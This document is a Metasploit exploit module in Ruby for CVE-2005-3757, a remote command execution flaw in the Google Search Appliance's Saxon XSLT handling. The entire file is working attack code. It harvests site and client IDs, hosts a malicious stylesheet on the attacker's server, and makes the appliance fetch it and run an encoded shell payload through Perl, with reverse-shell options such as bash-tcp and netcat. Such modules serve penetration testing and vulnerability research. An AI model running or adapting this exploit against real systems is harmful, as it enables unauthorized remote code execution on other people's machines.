## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Google Appliance ProxyStyleSheet Command Execution', 'Description' => %q{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2005-3757'], ['OSVDB', '20981'], ['BID', '15509'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 4000, 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', {}]], 'DisclosureDate' => '2005-08-16', 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) end # Handle incoming requests from the appliance def on_request_uri(cli, request) print_status("Handling new incoming HTTP request...") exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))' data = @xml_data.gsub(/:x:MSF:x:/, exec_str) send_response(cli, data) end def autofilter true end def check res = send_request_cgi({ 'uri' => '/search', 'vars_get' => { 'client' => rand_text_alpha(rand(15) + 1), 'site' => rand_text_alpha(rand(15) + 1), 'output' => 'xml_no_dtd', 'q' => rand_text_alpha(rand(15) + 1), 'proxystylesheet' => 'http://' + rand_text_alpha(rand(15) + 1) + '/' } }, 10) if (res and res.body =~ /cannot be resolved to an ip address/) vprint_status("This system appears to be vulnerable") return Exploit::CheckCode::Appears end if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/) vprint_status("This system appears to be patched") end return Exploit::CheckCode::Safe end def exploit # load the xml data path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml") fd = File.open(path, "rb") @xml_data = fd.read(fd.stat.size) fd.close print_status("Obtaining the appliance site and client IDs...") # Send a HTTP/1.0 request to learn the site configuration res = send_request_raw({ 'uri' => '/', 'version' => '1.0' }, 10) if !(res and res['location'] and res['location'] =~ /site=/) print_status("Could not read the location header: #{res.code} #{res.message}") return end m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im) if !(m and m[1] and m[2]) print_status("Invalid location header: #{res['location']}") return end print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...") start_service print_status("Requesting a search using our custom XSLT...") res = send_request_cgi({ 'uri' => '/search', 'vars_get' => { 'client' => m[2], 'site' => m[1], 'output' => 'xml_no_dtd', 'q' => rand_text_alpha(rand(15) + 1), 'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml", 'proxyreload' => '1' } }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") print_status("Waiting on the payload to execute...") select(nil, nil, nil, 20) else print_status("No response from the server") end end end